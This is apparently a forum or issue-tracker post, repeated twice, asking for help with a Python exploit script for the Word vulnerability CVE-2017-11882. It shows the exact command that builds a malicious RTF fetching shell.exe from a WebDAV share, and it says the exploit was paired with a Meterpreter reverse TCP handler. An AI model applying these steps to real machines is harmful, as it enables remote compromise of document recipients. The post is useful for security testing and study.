Greetings. It appears that in order for this script to work(for me), I had to supply the following arguments to the script: python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf. Otherwise, if I did this: python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf, I would get an error from Word saying could not find resource from \192.168.x.xwebdav. It appears that the python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse tcp payload. However, when I enter the WebDAV path in Windows using win+R, Windows somehow opens ups the webdav location in explorer before the meterpreter session could be established. Is anyone else or you experiencing this? Is this normal behavior?
Greetings. It appears that in order for this script to work(for me), I had to supply the following arguments to the script:
python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf. Otherwise, if I did this:python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf, I would get an error from Word sayingcould not find resource from \192.168.x.xwebdav. It appears that the python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse tcp payload. However, when I enter the WebDAV path in Windows using win+R, Windows somehow opens ups the webdav location in explorer before the meterpreter session could be established. Is anyone else or you experiencing this? Is this normal behavior?